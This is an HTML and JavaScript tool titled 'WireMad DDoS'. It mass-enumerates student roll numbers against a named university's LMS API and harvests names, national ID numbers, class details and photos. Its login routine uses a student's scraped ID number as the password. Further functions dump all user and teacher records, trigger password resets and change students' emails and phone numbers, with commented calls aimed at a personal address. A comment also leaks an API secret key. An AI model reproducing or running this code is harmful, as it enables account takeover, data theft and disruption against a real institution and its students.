<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>WireMad DDoS</title>
  <style>
    body {
      -webkit-tap-highlight-color: transparent;
      background-color: #000;
      color: #0f0;
      font-family: "Courier New", monospace;
      margin: 0;
      padding: 20px;
      text-align: center;
      transition: background-color 0.5s ease;
      background-size: cover;
      background-blend-mode: multiply;
      animation: matrixAnimation 5s infinite linear;
    }
    h1 {
      margin-bottom: 20px;
      text-shadow: 0 0 5px #00ff00;
      color: #0f0;
    }
    a {
      margin-bottom: 20px;
      text-shadow: none;
      color: #0f0;
    }
    #progressBarContainer {
      width: 80%;
      height: 30px;
      background-color: #222;
      border-radius: 25px;
      margin: 20px auto;
      box-shadow: 0 4px 6px rgba(0, 255, 0, 0.5);
      padding: 5px;
      position: relative;
      overflow: hidden;
    }
    #progressSent,
    #progressSuccess,
    #progressFail {
      height: 100%;
      position: absolute;
      top: 0;
      left: 0;
      transition: width 0.3s ease-in-out;
      border-radius: 20px;
    }
    canvas {
      display: block;
      width: 100%;
      height: 20px;
      border: 2px solid #444;
      border-radius: 8px;
      background-color: #2224;
      margin: 1px auto;
      overflow-x: auto;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
      image-rendering: pixelated;
    }
    #progressSent {
      width: 0;
      background-color: #555;
      z-index: 1;
    }
    #progressFail {
      width: 0;
      background-color: #f00;
      z-index: 2;
    }
    #progressSuccess {
      width: 0;
      background-color: #0f0;
      z-index: 3;
    }
    p {
      font-size: 18px;
      color: #00ff00;
      font-weight: bold;
    }
    button {
      background-color: #111;
      color: #00ff00;
      border: 2px solid #00ff00;
      padding: 10px 20px;
      margin-top: 20px;
      border-radius: 5px;
      font-size: 16px;
      cursor: pointer;
      transition: all 0.3s ease-in-out;
    }
    button:hover {
      background-color: #00ff00;
      color: #000;
      text-shadow: 0 0 10px #000;
    }
    footer {
      margin-top: 40px;
      font-size: 14px;
      text-shadow: 0 0 5px #00ff00;
    }
    input {
      padding: 8px;
      font-size: 16px;
      margin-top: 10px;
      color: #0f0;
      border: 1px solid #00ff00;
      border-radius: 5px;
      background-color: #111;
    }
    #status {
      font-size: 16px;
      color: #00ff00;
      margin-top: 20px;
      text-shadow: 0 0 5px #00ff00;
    }
    #log {
      margin-top: 20px;
      font-size: 12px;
      color: #00ff00;
      background-color: #111;
      padding: 10px;
      border-radius: 5px;
      border: 1px solid #00ff00;
    }
    #requestRateSlider,
    #batchSlider {
      -webkit-appearance: none;
      appearance: none;
      width: 80%;
      height: 10px;
      border-radius: 5px;
      background: linear-gradient(to right, #00ff00 0%, #111 0%);
      border: 2px solid #00ff00;
      outline: none;
      transition: background 0.2s;
      display: block;
      margin: 10px auto;
    }
    #requestRateSlider::-webkit-slider-thumb,
    #batchSlider::-webkit-slider-thumb {
      -webkit-appearance: none;
      appearance: none;
      width: 20px;
      height: 20px;
      border-radius: 50%;
      background: #00ff00;
      cursor: pointer;
      border: 2px solid #000;
      transition: transform 0.2s;
    }
    #requestRateSlider::-webkit-slider-thumb:hover,
    #batchSlider::-webkit-slider-thumb:hover {
      transform: scale(1.2);
    }
    #requestRateSlider::-moz-range-thumb,
    #batchSlider::-moz-range-thumb {
      width: 20px;
      height: 20px;
      border-radius: 50%;
      background: #00ff00;
      cursor: pointer;
      border: 2px solid #000;
    }
    #requestRateValue,
    #batchValue {
      font-size: 16px;
      font-weight: bold;
      color: #00ff00;
      text-shadow: 0 0 5px #00ff00;
      margin-top: 5px;
    }
    ::-webkit-scrollbar {
      width: 4px;
    }
    ::-webkit-scrollbar-track {
      background: #111;
      border-radius: 5px;
    }
    ::-webkit-scrollbar-thumb {
      background: #00ff00;
      border-radius: 5px;
      transition: background 0.3s;
    }
    ::-webkit-scrollbar-thumb:hover {
      background: #00cc00;
    }
    * {
      scrollbar-width: thin;
      scrollbar-color: #00ff00 #111;
    }
    .checkbox-container {
      display: flex;
      width: 50%;
      text-align: center;
      transform: translate(30%, 0);
      align-items: center;
      align-content: center;
      cursor: pointer;
      font-size: 16px;
      font-weight: bold;
      user-select: none;
    }
    .checkbox-container input {
      display: none;
    }
    .checkbox-container .checkmark {
      width: 28px;
      height: 20px;
      border: 2px solid #00ff00;
      border-radius: 4px;
      position: relative;
      transition: all 0.3s ease-in-out;
      display: inline-block;
      margin: 10px;
    }
    .checkbox-container input:checked+.checkmark {
      background-color: #00ff00;
      border-color: #00ff00;
      box-shadow: 0 0 10px #00ff00;
    }
    .checkbox-container input:checked+.checkmark::after {
      content: "";
      position: absolute;
      left: 6px;
      top: 2px;
      width: 6px;
      height: 12px;
      border: solid black;
      border-width: 0 2px 2px 0;
      transform: rotate(45deg);
    }
    .checkbox-container:hover .checkmark {
      border-color: #00ff00;
      box-shadow: 0 0 8px #00ff00;
    }
@keyframes matrixAnimation {
      0% {
        background-position: 0 0;
      }
      100% {
        background-position: 100% 100%;
      }
    }
  </style>
</head>
<body>
  <h1 id="titlee">WireMad</h1>
  <div id="progressBarContainer">
    <div id="progressSent"></div>
    <div id="progressFail"></div>
    <div id="progressSuccess"></div>
  </div>
  <canvas id="requestCanvas"></canvas>
  <div id="status"></div>
  <div>
    <button id="startButton">Start</button>
    <button id="pauseButton" style="display: none">Pause</button>
    <button id="resumeButton" style="display: none">Resume</button>
    <button id="stopButton">Abort</button>
    <button onclick="save()">Save</button>
    <button onclick="load()">Load</button>
  </div>
  <br />
  <div>
    <label for="offsetInput">Start at: </label><br />
    <input type="number" id="offsetInput" value="1" />
    <br />
    <label for="totalRequestsInput">End at: </label><br />
    <input type="number" id="totalRequestsInput" value="1" />
    <br /><br />
    <label for="batchSlider">Batch Size: </label>
    <input
    type="range"
    id="batchSlider"
    min="1"
    max="30"
    step="1"
    value="1"
    />
    <span id="batchValue">1</span>
    <br />
    <label for="requestRateSlider">Request Rate (ms): </label>
    <input
    type="range"
    id="requestRateSlider"
    min="1"
    max="5000"
    step="1"
    value="1000"
    />
    <span id="requestRateValue">1000 ms</span><br />
    <label class="checkbox-container">
      Await response:
      <input type="checkbox" id="awaitres" />
      <span class="checkmark"></span>
    </label>
  </div>
  <button id="down">Download CSV</button>
  <p>
    Requests sent: <span id="requestsSent">0</span> of
    <span id="totalRequests">1</span>
  </p>
  <div id="log"></div>
  <input type="text" id="roll" placeholder="Username" />
  <input type="text" id="pass" placeholder="Password" />
  <button onclick="login()" id="logi">Login</button>
  <div id="keys">
    0 keys available
  </div>
  <button onclick="delIds()" id="clearButton">Clear Keys</button><br /><br />
  Discovered
  <p id="disc">
    All:11<br />All:12<br>All:11F<br>All:12F
  </p>
  <footer>
    <p>
      Top Secret Operation
    </p>
    <a href="index.html">WireMad</a>
    <a href="csvsort.html">CSV Sort</a>
    <a href="dcoumentation.html">Documentation</a>
  </footer>
  <script>
    const testMode = true;
    let awaitReply = false;
    let totalRequests,
    offset,
    batchSize,
    requestRate,
    requestsSent = 0,
    requestsSuccess = 0,
    requestsDone = 0,
    requestsFail = 0;
    let startT = 0;
    let isRunning = false;
    let pnow = 0;
    isPaused = false,
    responseData = [],
    requestQueue = [],
    logData = [];
    let suffix = "-1-24";
    const $ = (id) => document.getElementById(id);
    const [reqRateSlider, reqRateValue, batchSlider, batchValue] = [
      "requestRateSlider",
      "requestRateValue",
      "batchSlider",
      "batchValue",
    ].map($);
    const [
      progressSent,
      progressFail,
      progressSuccess,
      requestsSentText,
      statusText,
      logDiv,
    ] = [
      "progressSent",
      "progressFail",
      "progressSuccess",
      "requestsSent",
      "status",
      "log",
    ].map($);
    reqRateSlider.oninput = () => (
      (requestRate = +reqRateSlider.value),
      (reqRateValue.textContent = `${requestRate} ms`)
    );
    batchSlider.oninput = () => (
      (batchSize = +batchSlider.value), (batchValue.textContent = batchSize)
    );
    function load() {
      console.log("loading");
      responseData = JSON.parse(localStorage.getItem("savedrd"));
      canvas.width = parseInt(responseData[responseData.length-1][0].slice(0, 4));
      for (let i = 0; i < responseData.length; i++) {
        let n = parseInt(responseData[i][0].slice(0, 4));
        drawRequestLine(n, "success");
      }
    }
    function save() {
      console.log("saving");
      localStorage.setItem("savedrd", JSON.stringify(responseData));
    }
    const shuffle = (arr) => arr.sort(() => Math.random() - 0.5);
    const updateProgress = () => {
      progressSent.style.width = `${(requestsSent / totalRequests) * 100}%`;
      progressFail.style.width = `${
      ((requestsFail + requestsSuccess) / totalRequests) * 100
      }%`;
      progressSuccess.style.width = `${
      (requestsSuccess / totalRequests) * 100
      }%`;
      requestsSentText.textContent = requestsSent;
      statusText.innerHTML = `Done: ${requestsSuccess}, Failed: ${requestsFail}<br>Sent: ${requestsSent}<br>Time: ${Math.floor(pnow-startT)/1000}s`;
      logDiv.innerHTML = logData.slice(-10).join("<br>");
    };
    const canvas = $("requestCanvas"),
    ctx = canvas.getContext("2d");
    (canvas.width = 10), (canvas.height = 20);
    canvas.addEventListener("touchstart", (event) => {
      const rect = canvas.getBoundingClientRect();
      const touch = event.touches[0];
      const iw = rect.right - rect.left;
      const x = Math.round(map(touch.clientX - rect.left, 0, iw, 0, canvas.width));
      requestsSent--;
      let snt = (parseInt(document.getElementById("offsetInput").value)+x).toString().padStart(4, "0");
      console.log(snt);
      dep_sendreq(`${snt}${suffix}`);
    });
    function map(value, inMin, inMax, outMin, outMax) {
      return ((value - inMin) * (outMax - outMin)) / (inMax - inMin) + outMin;
    }
    const drawRequestLine = (rollNumber, status) => {
      ctx.fillStyle =
      status === "success" ? "#0f0": status === "sent" ? "grey": "red";
      if (status == "failb") {
        ctx.fillStyle = "#fa0";
      }
      ctx.fillRect(
        ((rollNumber - offset) * canvas.width) / totalRequests,
        0,
        1,
        canvas.height
      );
    };
    async function sendRequesttt(n) {
      if (!isRunning || isPaused) return;
      let pi = logData.length;
      logData.push(`Sending request ${n}...`);
      drawRequestLine(+n.slice(0, 4), "sent");
      try {
        let token = randId();
        requestsSent++;
        updateProgress();
        let response = await fetch(
          Math.random() < 0.93
          ? "https://meme-api.com/gimme": "https://meme-api.com/gimme/banantheyd"
        );
        if (!response.ok) throw new Error(`HTTP Error: ${response.status}`);
        let data = await response.json();
        processMeme(data);
        requestsSuccess++;
        drawRequestLine(+n.slice(0, 4), "success");
        logData[pi] = `Request ${n} completed`;
      } catch {
        requestsFail++;
        drawRequestLine(+n.slice(0, 4), "fail");
        logData[pi] = `Request ${n} failed`;
      }
      requestsDone++;
      updateProgress();
      if (requestsDone >= totalRequests) complete();
    }
    const sendRequestsParallel = async () => {
      if (!isRunning || isPaused) return;
      awaitReply = document.getElementById("awaitres").checked;
      if (!awaitReply) {
        Promise.all(
          requestQueue.splice(0, batchSize).map(
            (n) =>
            new Promise((resolve) =>
              setTimeout(() => {
                if (testMode) {
                  sendComp(n).then(resolve);
                } else {
                  dep_sendreq(n).then(resolve);
                }

              },
                Math.random() * 5)
            )
          )
        );
      } else {
        await Promise.all(
          requestQueue.splice(0, batchSize).map(
            (n) =>
            new Promise((resolve) =>
              setTimeout(() => {
                if (testMode) {
                  sendRequest(n).then(resolve);
                } else {
                  dep_sendreq(n).then(resolve);
                }
              },
                Math.random() * 5)
            )
          )
        );
      }
      pnow = performance.now();
      if (requestsSent < totalRequests && isRunning && !isPaused)
        setTimeout(sendRequestsParallel, requestRate);
    };
    document.addEventListener("DOMContentLoaded", ()=> {
      let dat = JSON.parse(localStorage.getItem("searchstate"));
      console.log(dat);

      document.getElementById("requestRateSlider").value = dat.rate;
      document.getElementById("batchSlider").value = dat.batch;
      document.getElementById("offsetInput").value = dat.start;
      document.getElementById("totalRequestsInput").value = dat.end;
      document.getElementById("awaitres").checked = dat.wait;
      document.getElementById("requestRateValue").innerHTML = `${dat.rate} ms`
      document.getElementById("batchValue").innerHTML = `${dat.batch}`
    });


    const complete = () => {
      $("startButton").style.display = "inline";
      ["pauseButton",
        "resumeButton"].forEach(
        (id) => ($(id).style.display = "none")
      );
      document.body.style.backgroundColor = "#363";
      $("titlee").textContent = "Transfer Complete";
      pnow = performance.now();
      unlockInputs();
    };
    const lockInputs = () =>
    ["totalRequestsInput", "offsetInput"].forEach(
      (id) => ($(id).disabled = true)
    );
    const unlockInputs = () =>
    ["totalRequestsInput", "offsetInput"].forEach(
      (id) => ($(id).disabled = false)
    );
    $("startButton").addEventListener("click", () => {
      if (gcuids.length <= 0 && !testMode) {
        alert("0 keys available, please login");
        return;
      }
      startT = performance.now();
      navigator.wakeLock.request("screen");
      document.body.style.backgroundColor = "#000";
      $("titlee").textContent = "Wiring Data...";
      offset = +$("offsetInput").value;
      totalRequests = +$("totalRequestsInput").value - offset + 1;
      batchSize = +batchSlider.value;
      requestRate = +reqRateSlider.value;
      (isRunning = true),
      (isPaused = false),
      (requestsSent = requestsSuccess = requestsFail = requestsDone = 0);
      (canvas.width = totalRequests),
      ctx.clearRect(0, 0, canvas.width, canvas.height);
      $("totalRequests").textContent = totalRequests;
      requestQueue = shuffle(
        Array.from(
          {
            length: totalRequests,
          },
          (_, i) => `${(offset + i).toString().padStart(4, "0")}${suffix}`
        )
      );
      localStorage.setItem("searchstate", JSON.stringify({
        rate: requestRate, batch: batchSize, start: offset, end: totalRequests-1+offset, wait: document.getElementById("awaitres").checked
      }));
      $("startButton").style.display = "none";
      $("pauseButton").style.display = "inline";
      $("resumeButton").style.display = "none";
      lockInputs();
      sendRequestsParallel();
    });
    $("pauseButton").addEventListener("click", () => {
      isPaused = true;
      $("pauseButton").style.display = "none";
      $("resumeButton").style.display = "inline";
    });
    $("resumeButton").addEventListener("click", () => {
      isPaused = false;
      $("resumeButton").style.display = "none";
      $("pauseButton").style.display = "inline";
      sendRequestsParallel();
    });
    $("stopButton").addEventListener("click", () => {
      isRunning = isPaused = false;
      statusText.textContent = "Requests stopped";
      unlockInputs();
      $("startButton").style.display = "inline";
      ["pauseButton",
        "resumeButton"].forEach(
        (id) => ($(id).style.display = "none")
      );
    });
    let gcuids = [];
    function getIds() {
      let ids = [];
      for (let i = 0; i < 250; i++) {
        if (
          localStorage.getItem("gcuid" + i) != null &&
          localStorage.getItem("gcuid" + i) != "null"
        ) {
          ids.push(localStorage.getItem("gcuid" + i));
        } else {
          document.getElementById("keys").innerHTML =
          ids.length + " keys available";
          gcuids = ids;
          return ids;
        }
      }
    }
    getIds();
    function pushId(id) {
      localStorage.setItem("gcuid" + gcuids.length, id);
      gcuids.push(id);
      document.getElementById("keys").innerHTML =
      gcuids.length + " keys available";
    }
    function randId() {
      return gcuids[Math.floor(Math.random() * gcuids.length)];
    }
    function delIds() {
      for (let i = 0; i < 250; i++) localStorage.setItem("gcuid" + i, null);
      gcuids = [];
      document.getElementById("keys").innerHTML =
      gcuids.length + " keys available";
    }
    function processMeme(response) {
      const memeData = {
        postLink: response.postLink || "",
        subreddit: response.subreddit || "",
        title: response.title || "",
        url: response.url || "",
        author: response.author || "",
      };
      responseData.push(memeData);
    }
    let guh = 0;
    const downloadCSV = (data, filename = "data.csv") => {
      if (!data || data.length === 0) {
        console.warn("No data to download");
        return;
      }
      const headers = Object.keys(data[0]);
      const csvRows = [
        ...data.map(row => headers.map(field => row[field] ?? "").join(","))
      ];
      const blob = new Blob([csvRows.join("\n")], {
        type: "text/csv"
      });
      const url = URL.createObjectURL(blob);
      const link = Object.assign(document.createElement("a"), {
        href: url,
        download: filename,
      });
      document.body.appendChild(link);
      link.click();
      document.body.removeChild(link);
    };
    $("down").addEventListener("click", () => {
      downloadCSV(responseData, `${totalRequests}_${guh}_responses.csv`);
      guh++;
    });
    async function login() {
      const url = "https://lms.gcu.edu.pk/api/auth/login";
      const rollInput = document.getElementById("roll");
      const passInput = document.getElementById("pass");
      if (!passInput.value) passInput.value = await sendComp(rollInput.value);
      if (!passInput.value) return alert("Can't login");
      let data = {
        usnm: rollInput.value,
        pwd: passInput.value
      };
      try {
        const response = await fetch(url, {
          method: "POST",
          headers: {
            Authorization: "Bearer null",
            Accept: "application/json, text/plain, */*",
            "Content-Type": "application/json",
          },
          body: JSON.stringify(data),
        });
        const result = await response.json();
        console.log("Response:", result);
        localStorage.setItem("gcuid", result[1]);
        pushId(result[1]);
        localStorage.setItem("onlogin", JSON.stringify(result));
      } catch (error) {
        console.error("Login Error:", error);
      }
    }
    async function sendRequest(url, method, token, body = null) {
      let headers = {
        Authorization: `Bearer ${token}`,
        Accept: "application/json, text/plain, */*",
        "Content-Type": "application/json",
      };
      let options = {
        method,
        headers
      };
      if (body) options.body = JSON.stringify(body);
      let response = await fetch(url, options);
      if (!response.ok) throw new Error(`HTTP Error: ${response.status}`);
      console.log(response);
      let ress = await response.json();
      console.log(ress);
      return ress;
    }
    async function dep_sendreq(n) {
      const url = "https://lms.gcu.edu.pk/api/student/S_getStdtDetail_tm";
      let pi = logData.length;
      logData.push(`Sending request ${n}...`);
      drawRequestLine(+n.slice(0, 4), "sent");
      try {
        requestsSent++;
        updateProgress();
        let re = await sendRequest(url, "POST", randId(), {
          ROLNO: n
        });
        console.log(re);
        let data = re[0][0];
        if (data) {
          responseData.push([n, data.c_code, data.se_id, data.maj_id, data.nm, data.class_nm, data.t_no]);
          requestsSuccess++;
          drawRequestLine(+n.slice(0, 4), "success");
          logData[pi] = `Request ${n} completed`;
        } else {
          requestsFail++;
          drawRequestLine(+n.slice(0, 4), "failb");
          logData[pi] = `Request ${n} unavailable`;
        }
      } catch (e) {
        console.log(e);
        requestsFail++;
        drawRequestLine(+n.slice(0, 4), "fail");
        logData[pi] = `Request ${n} failed`;
      }
      requestsDone++;
      updateProgress();
      if (requestsDone >= totalRequests) complete();
    }
    const objectToArray = (obj) => Object.values(obj);
    async function sendComp(n) {
      if (localStorage.getItem("compres"+n)) {
        let r = JSON.parse(localStorage.getItem("compres"+n));
        console.log(r);
        return r.NIC;
      }
      const url = `https://lms.gcu.edu.pk/api/student/getStudentInformation/${n}`;
      let pi = logData.length;
      logData.push(`Sending request ${n}...`);
      drawRequestLine(+n.slice(0, 4), "sent");
      try {
        requestsSent++;
        updateProgress();
        let data = await sendRequest(url, "GET", randId());
        console.log(data);
        responseData.push(objectToArray(data));
        if (data) {
          requestsSuccess++;
          drawRequestLine(+n.slice(0, 4), "success");
          logData[pi] = `Request ${n} completed`;
          responseData.push(objectToArray(data));
          localStorage.setItem("compres"+n, JSON.stringify(data));
          return data.NIC;
        } else {
          requestsFail++;
          drawRequestLine(+n.slice(0, 4), "failb");
          logData[pi] = `Request ${n} failed`;
        }
      } catch (e) {
        console.log(e);
        requestsFail++;
        drawRequestLine(+n.slice(0, 4), "fail");
        logData[pi] = `Request ${n} failed`;
      }
      requestsDone++;
      updateProgress();
      if (requestsDone >= totalRequests) complete();
    }
    
    const objectToArrayOrdered = (obj, n) => {
      return [
        n,
        obj.M_ID,
        obj.SE_NM,
        `${obj.SUB_COMB.replace(/,/g, "/")}`,
        obj.T_NO,
        obj.f_nm
      ];
    };
    async function getF(n) {
      const url = `https://lms.gcu.edu.pk/api/session/std_PDF/${n}`;
      let pi = logData.length;
      logData.push(`Sending request ${n}...`);
      drawRequestLine(+n.slice(0, 4), "sent");
      try {
        requestsSent++;
        updateProgress();
        let data = await sendRequest(url, "GET", randId());
        console.log(data);
        if (data[0] != undefined) {
          requestsSuccess++;
          drawRequestLine(+n.slice(0, 4), "success");
          logData[pi] = `Request ${n} completed`;
          let xd = objectToArrayOrdered(data[0], n);
          responseData.push(xd);
        } else {
          requestsFail++;
          drawRequestLine(+n.slice(0, 4), "failb");
          logData[pi] = `Request ${n} failed`;
        }
      } catch (e) {
        console.log(e);
        requestsFail++;
        drawRequestLine(+n.slice(0, 4), "fail");
        logData[pi] = `Request ${n} failed`;
      }
      requestsDone++;
      updateProgress();
      if (requestsDone >= totalRequests) complete();
    }
    //getPic("111/829/63/3606-1-24");
    async function getPic(n) {
      const url = `https://sfc.gcu.edu.pk/get-lms-img/${n}`;
      let pi = logData.length;
      logData.push(`Sending request ${n}...`);
      drawRequestLine(+n.slice(0, 4), "sent");
      try {
        requestsSent++;
        updateProgress();
        let data = await sendRequest(url, "GET", randId());
        console.log(data);
        if (data) {
          requestsSuccess++;
          drawRequestLine(+n.slice(0, 4), "success");
          logData[pi] = `Request ${n} completed`;
        } else {
          requestsFail++;
          drawRequestLine(+n.slice(0, 4), "failb");
          logData[pi] = `Request ${n} failed`;
        }
      } catch (e) {
        console.log("rr", e);
        requestsFail++;
        drawRequestLine(+n.slice(0, 4), "fail");
        logData[pi] = `Request ${n} failed`;
      }
      requestsDone++;
      updateProgress();
      if (requestsDone >= totalRequests) complete();
    }
    // 3730-1-24,111,829,63,1
    //showstd("0148-1-24", "1", "61", "789");
    async function showstd(n, ccode, majid, seid) {
      const url = "https://lms.gcu.edu.pk/api/showstudent/getstudent";
      let re = await sendRequest(url, "POST", randId(), {
        c_code: ccode,
        maj_id: majid,
        se_id: seid,
      });
      console.log(re);
    }
    //resetPassword("3606-1-24", "alimad.co.ltd@gmail.com");
    async function resetPassword(n, mail) {
      const url = "https://lms.gcu.edu.pk/api/auth/forgetPassword";
      let re = await sendRequest(url, "POST", randId(), {
        email: mail,
        usr: n,
      });
      console.log(re);
    }
    //getallrooms();
    async function getallrooms() {
      const url = "https://lms.gcu.edu.pk/api/showstudent/getAllRoomStrength";
      let re = await sendRequest(url, "GET", randId());
      console.log(re);
    }
    //'x-secret-key': '0333666224403096681544',
    //getWholeAttendance();
    async function getWholeAttendance() {
      const url = `https://lms.gcu.edu.pk/api/attandence/getWholeAttendance`;
      let re = await sendRequest(url, "POST", randId(), {
        usr: "3606-1-24",
      });
      console.log(re);
    }
    async function getStudentInformation(rolNo) {
      const url = `https://lms.gcu.edu.pk/api/student/getStudentInformation/${rolNo}`;
      return await sendRequest(url, "GET", randId());
    }
    //getTmClasses();
    async function getTmClasses(rolNo) {
      const url = `https://lms.gcu.edu.pk/api/class/getTmClasses/`;
      return await sendRequest(url, "GET", randId());
    }
    //getSessions("1");
    async function getSessions(cls) {
      const url = `https://lms.gcu.edu.pk/api/session/getSessionsFromTm/${cls}`;
      return await sendRequest(url, "GET", randId());
    }
    async function getAllSessions(codesJson) {
      const cCodes = JSON.parse(codesJson);
      let allSessions = [];

      for (let entry of cCodes) {
        try {
          let response = await getSessions(entry.C_CODE);
          allSessions.push({
            C_CODE: entry.C_CODE, sessions: response
          });
        } catch (error) {
          console.error(
            `Error fetching sessions for C_CODE ${entry.C_CODE}:`,
            error
          );
        }
      }

      return allSessions;
    }
    const cCodesJson = `...`;
    /*getAllSessions(cCodesJson).then((combinedData) => {
        console.log(combinedData);
        console.log(JSON.stringify(combinedData));
      });*/
    //getSect("1", "789", "1", "URDU-1001", "61");
    async function getSect(c_code, se_id, t_no, sub_code, maj_id) {
      const url = `https://lms.gcu.edu.pk/util/getSect/${c_code}/${se_id}/${t_no}/${
      sub_code || "null"
      }/${maj_id || 0}`;
      return await sendRequest(url, "GET", randId());
    }
    //getSubjectNature();
    async function getSubjectNature() {
      const url = `https://lms.gcu.edu.pk/util//getSubjects/100/1`;
      return await sendRequest(url, "GET", randId());
    }
    async function getAllT() {
      const url = `https://lms.gcu.edu.pk/api/teacher/getTeachers/100`;
      let r = await sendRequest(url, "GET", randId());
      console.log(JSON.stringify(r));
      downloadJSON(r);
    }
    async function getAllUsers() {
      const url = `https://lms.gcu.edu.pk/util/UserDetail`;
      let r = await sendRequest(url, "POST", randId(),{});
      console.log(JSON.stringify(r));
      downloadJSON(r);
    }
    async function getGroups() {
      const url = `https://lms.gcu.edu.pk/api/group/getGroups`;
      let r = await sendRequest(url, "POST", randId(),{c_code:1,se_id:789});
      console.log(JSON.stringify(r));
      downloadJSON(r);
    }
    //getGroups();
    async function getGPU() {
      const url = `https://lms.gcu.edu.pk/util/getCPU_Consumption`;
      let r = await sendRequest(url, "POST", randId(),{});
      console.log(JSON.stringify(r));
      downloadJSON(r);
    }
    //getGPU();
    async function getDb() {
      const url = `https://lms.gcu.edu.pk/api/teacher/getTeacherInformation/100801/100`;
      let r = await sendRequest(url, "GET", randId());
      console.log(JSON.stringify(r));
      downloadJSON(r);
    }
    //getDb();
    function downloadJSON(obj, filename = 't100704.json') {
      const jsonStr = JSON.stringify(obj, null, 2);
      const blob = new Blob([jsonStr], {
        type: 'application/json'
      });
      const url = URL.createObjectURL(blob);
      const link = document.createElement('a');
      link.href = url;
      link.download = filename;
      link.click();
      URL.revokeObjectURL(url);
    }

    //editEmail(`{RolNo: "3686-1-24", Email: "alimad.co.ltd@gmail.com"}`);
    async function editEmail(params) {
      const url = `https://lms.gcu.edu.pk/api/student/editEmailstd`;
      return await sendRequest(url, "POST", randId(), params);
    }

    async function editPhone(params) {
      const url = `https://lms.gcu.edu.pk/api/student/editPhonestd`;
      return await sendRequest(url, "POST", randId(), params);
    }

    async function S_StdtAssignmentDetail(ROLNO) {
      const url = `https://lms.gcu.edu.pk/api/student/S_StdtAssignmentDetail`;
      return await sendRequest(url, "POST", randId(), {
        ROLNO
      });
    }
    //_getStdtPicture("1", "61", "789", "0148-1-24");
    async function _getStdtPicture(c_code, se_id, maj_id, rolno) {
      const url = `https://lms.gcu.edu.pk/api/student/S_getStdtPicture`;
      return await sendRequest(url, "POST", randId(), {
        c_code,
        se_id,
        maj_id,
        rolno,
      });
    }
    async function S_getStdtPicture(C_CODE, SE_ID, MAJ_ID, ROLNO) {
      const token = localStorage.getItem("gcuid"); // Retrieve the token from local storage
      const url = `https://sfc.gcu.edu.pk/get-file/${C_CODE}/${SE_ID}/${MAJ_ID}/${ROLNO}`;

      const headers = {
        Authorization: `Bearer ${token}`,
      };

      try {
        let response = await fetch(url, {
          method: "GET", headers
        });
        if (!response.ok)
          throw new Error(`HTTP error! Status: ${response.status}`);

        let blob = await response.blob();
        return blob;
      } catch (error) {
        console.error("Error fetching student picture:", error);
        return null;
      }
    }

    async function addMessage(
      message,
      start_date,
      end_date,
      user_role,
      d_id
    ) {
      const url = `${baseUrl}/api/showstudent/Addmessage`;

      let response = await sendRequest(url, "POST", randId(), {
        message: message,
        start_date: start_date,
        end_date: end_date,
        user_role: user_role,
        d_id: d_id,
      });

      console.log(response);
    }

    let formRefValue = {
      "c_code": 1,
      "se_id": 789,
      "t_no": 1,
      "sub_code": "URDU-1001"
    }

    async function getTimetable() {
      const grp = prompt("Enter group:");
      const dept = prompt("Enter department:");
      const isAdmin = prompt("Is admin? (yes/no):");
      const params = {
        ...formRefValue,
        grp: grp.toString(),
        dept: dept,
        isAdmin: isAdmin === "yes"
      };
      let response = await sendRequest(`https://lms.gcu.edu.pk/timetable/getTimetable`, 'POST', randId(), JSON.stringify(params)
      );

      const data = await response.json();
      console.log(data);
    }
    //getTimetable();
  </script>
</body>
</html>